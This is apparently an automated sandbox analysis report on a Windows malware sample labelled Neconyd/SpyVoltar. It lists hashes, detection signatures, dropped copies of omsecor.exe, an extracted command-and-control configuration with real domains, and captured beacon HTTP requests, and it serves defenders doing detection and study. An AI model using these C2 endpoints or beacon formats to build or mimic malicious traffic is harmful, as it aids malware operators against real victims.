
Windows Analysis Report
nNX5KYQRhg.exe

Overview

General Information

Sample name: nNX5KYQRhg.exe (renamed because original name is a hash value)
Original sample name: 682abf7611b349bb614207e0fcca057ab84389a6.exe
Analysis ID: 1546830
MD5: 44a881b87bb2d5dfe7062b9a7538425f
SHA1: 682abf7611b349bb614207e0fcca057ab84389a6
SHA256: fc22b8c7e16c145772129e466d1977f14f09c1302da688eb96863e409cbb6a58
Tags: exe, ReversingLabs, user-NDA0E

Detection

Neconyd
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Neconyd
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain (may stop execution after accessing registry keys)
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • nNX5KYQRhg.exe (PID: 2848 cmdline: "C:\Users\user\Desktop\nNX5KYQRhg.exe" MD5: 44A881B87BB2D5DFE7062B9A7538425F)
    • omsecor.exe (PID: 3756 cmdline: C:\Users\user\AppData\Roaming\omsecor.exe MD5: DCC8263D314F19A3A35E32EDFCCDC942)
      • omsecor.exe (PID: 1268 cmdline: C:\Windows\System32\omsecor.exe MD5: 1FB6FB78751B952FE1D6BEBA89C93830)
        • omsecor.exe (PID: 3908 cmdline: C:\Windows\SysWOW64\omsecor.exe /nomove MD5: 1FB6FB78751B952FE1D6BEBA89C93830)
  • cleanup
Malware configuration: {"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "ht:/r.irsf.o/", "http://lousta.net/"]}

Source | Rule | Description | Author | Strings
Process Memory Space: nNX5KYQRhg.exe PID: 2848 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 3756 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 1268 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |
Process Memory Space: omsecor.exe PID: 3908 | JoeSecurity_Neconyd | Yara detected Neconyd | Joe Security |

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-01T16:22:19.281249+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49763 | TCP
2024-11-01T16:22:57.393256+0100 | 2022930 | 1 | A Network Trojan was detected | 172.202.163.200 | 443 | 192.168.2.6 | 49973 | TCP
2024-11-01T16:22:01.694283+0100 | 2016998 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:20.910667+0100 | 2018141 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.6 | 49776 | TCP
2024-11-01T16:22:20.910667+0100 | 2037771 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.6 | 49776 | TCP
2024-11-01T16:21:58.969242+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50009 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:10.199354+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49709 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:18.801892+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49727 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:19.623901+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49769 | 15.197.204.56 | 80 | TCP
2024-11-01T16:22:20.790141+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49776 | 52.34.198.229 | 80 | TCP
2024-11-01T16:22:29.863054+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49788 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:38.613596+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49830 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:39.356294+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49879 | 15.197.204.56 | 80 | TCP
2024-11-01T16:22:40.327774+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49885 | 52.34.198.229 | 80 | TCP
2024-11-01T16:22:48.943456+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49891 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:57.731117+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49938 | 193.166.255.171 | 80 | TCP
2024-11-01T16:22:58.006313+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49879 | 15.197.204.56 | 80 | TCP
2024-11-01T16:22:58.961028+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49983 | 52.34.198.229 | 80 | TCP
2024-11-01T16:23:07.664946+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49989 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:16.258859+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49995 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:16.999344+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49996 | 15.197.204.56 | 80 | TCP
2024-11-01T16:23:17.946497+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49997 | 52.34.198.229 | 80 | TCP
2024-11-01T16:23:26.666239+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49998 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:35.272306+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49999 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:36.587988+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50001 | 15.197.204.56 | 80 | TCP
2024-11-01T16:23:37.569661+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50002 | 52.34.198.229 | 80 | TCP
2024-11-01T16:23:46.286758+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50003 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:55.051681+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50004 | 193.166.255.171 | 80 | TCP
2024-11-01T16:23:55.834896+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50005 | 15.197.204.56 | 80 | TCP
2024-11-01T16:23:56.826488+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50006 | 52.34.198.229 | 80 | TCP
2024-11-01T16:24:05.543153+0100 | 2015786 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50007 | 193.166.255.171 | 80 | TCP


          AV Detection

Source: nNX5KYQRhg.exe | Avira: detected
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Avira: detection malicious, Label: TR/SpyVoltar.absza
Source: C:\Windows\SysWOW64\omsecor.exe | Avira: detection malicious, Label: TR/SpyVoltar.absza
Source: nNX5KYQRhg.exe | Malware Configuration Extractor: Neconyd {"C2 url": ["http://mkkuei4kdsz.com/", "http://ow5dirasuek.com/", "ht:/w.irsf.o/", "ht:/r.irsf.o/", "http://lousta.net/"]}
Source: nNX5KYQRhg.exe | ReversingLabs: Detection: 86%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Roaming\omsecor.exe | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\omsecor.exe | Joe Sandbox ML: detected
Source: nNX5KYQRhg.exe | Joe Sandbox ML: detected
Source: nNX5KYQRhg.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_0040ABD9 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_0040ABD9 FindFirstFileW,FindClose
Source: C:\Windows\SysWOW64\omsecor.exe | Code function: 5_2_00408248 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose

          Networking

Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49709 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49776 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49769 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49727 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49788 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49879 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49830 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49885 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49891 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49983 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49989 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49998 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50004 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49996 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49999 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50005 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50007 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50003 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49997 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50001 -> 15.197.204.56:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49995 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50006 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:49938 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50002 -> 52.34.198.229:80
Source: Network traffic | Suricata IDS: 2015786 - Severity 1 - ET MALWARE Ransom.Win32.Birele.gsg Checkin : 192.168.2.6:50009 -> 193.166.255.171:80
Source: Malware configuration extractor | URLs: http://mkkuei4kdsz.com/
Source: Malware configuration extractor | URLs: http://ow5dirasuek.com/
Source: Malware configuration extractor | URLs: ht:/w.irsf.o/
Source: Malware configuration extractor | URLs: ht:/r.irsf.o/
Source: Malware configuration extractor | URLs: http://lousta.net/
Source: global traffic | HTTP traffic detected: GET /404/921.html HTTP/1.1 From: 133749481198045666 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /97/341.html HTTP/1.1 From: 133749481198045666 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /922/501.html HTTP/1.1 From: 133749481198045666 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be Host: mkkuei4kdsz.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /158/381.html HTTP/1.1 From: 133749481198045666 Via: goqjiuq^uiv@;08bcrhe@9^serdq=4403435bovA6541aoe|A0;60:8358a99267395797f3jce;f5=be Host: ow5dirasuek.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /719/772.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /106/649.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /87/444.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: mkkuei4kdsz.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /65/168.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l8//+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474540|1730474540|0|1|0
Source: global traffic | HTTP traffic detected: GET /810/632.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /639/772.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /126/170.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: mkkuei4kdsz.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /524/9.html HTTP/1.1 From: 133749481401170560 Via: bjledplYpdq;6+3]^mc`;4Yn`m_l80/+./.0]jq<10/,\j`w<+61+53.03\44-12.40242a.e^`6a08]` Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474560|1730474540|10|2|0
Source: global traffic | HTTP traffic detected: GET /128/758.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a] Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /107/805.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a] Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /932/965.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a] Host: mkkuei4kdsz.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /913/437.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a] Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474578|1730474540|14|3|0
Source: global traffic | HTTP traffic detected: GET /883/755.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /761/49.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /477/877.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: mkkuei4kdsz.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /503/726.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474597|1730474540|16|4|0
Source: global traffic | HTTP traffic detected: GET /526/179.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /171/705.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /558/583.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: mkkuei4kdsz.com Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /640/808.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: ow5dirasuek.com Connection: Keep-Alive Cookie: snkz=173.254.250.82; btst=a64319d880fda39ea33c7ede5453fda7|173.254.250.82|1730474617|1730474540|18|5|0
Source: global traffic | HTTP traffic detected: GET /761/32.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: lousta.net Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /691/461.html HTTP/1.1 From: 133749481401170560 Via: ij`]mcu85/0\nn;5-.0Yidt;/30/222-2`131.121/611e+db]5e-7a]\mjaqtns Host: lousta.net Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 193.166.255.171
Source: Joe Sandbox View | IP Address: 52.34.198.229
Source: Joe Sandbox View | ASN Name: FUNETASFI
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | ASN Name: TANDEMUS
Source: Network traffic | Suricata IDS: 2016998 - Severity 1 - ET MALWARE Connection to Fitsec Sinkhole IP (Possible Infected Host) : 192.168.2.6:49709 -> 193.166.255.171:80
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.6:49776
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.6:49776
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49973
Source: Network traffic | Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 172.202.163.200:443 -> 192.168.2.6:49763
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\nNX5KYQRhg.exe | Code function: 0_2_00407036 Sleep,DeleteFileW,CreateFileW,GetLastError,SetEndOfFile,InternetOpenUrlW,CloseHandle,InternetQueryDataAvailable,InternetReadFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle
Source: global traffic | DNS traffic detected: DNS query: lousta.net
Source: global traffic | DNS traffic detected: DNS query: mkkuei4kdsz.com
Source: global traffic | DNS traffic detected: DNS query: ow5dirasuek.com
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/106/649.html
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/106/649.htmlo
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/106/649.htmlshqos.dll.mui
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/107/805.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/107/805.html(
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/128/758.html
Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/171/705.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/171/705.html-2
Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/404/921.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/526/179.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/526/179.htmlQ
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/639/772.html
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/639/772.htmlB
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/639/772.htmlG
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/639/772.htmlK
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/639/772.htmla
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.html)n%
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.html-2
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.html0n:
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.html4
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.html5n1
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.htmlena
Source: omsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/691/461.htmlhtml
Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/719/772.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/761/32.html
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/761/32.html22-2
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/761/32.html=
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/761/32.htmlA
Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://lousta.net/761/32.htmlb
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.htmli=
          Source: omsecor.exe, 00000008.00000003.3082838886.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/49.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/49.htmlu
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/810/632.html
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/810/632.htmlH
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/810/632.htmly
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/883/755.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/883/755.htmlL
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/97/341.html
          Source: omsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/com/p
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/
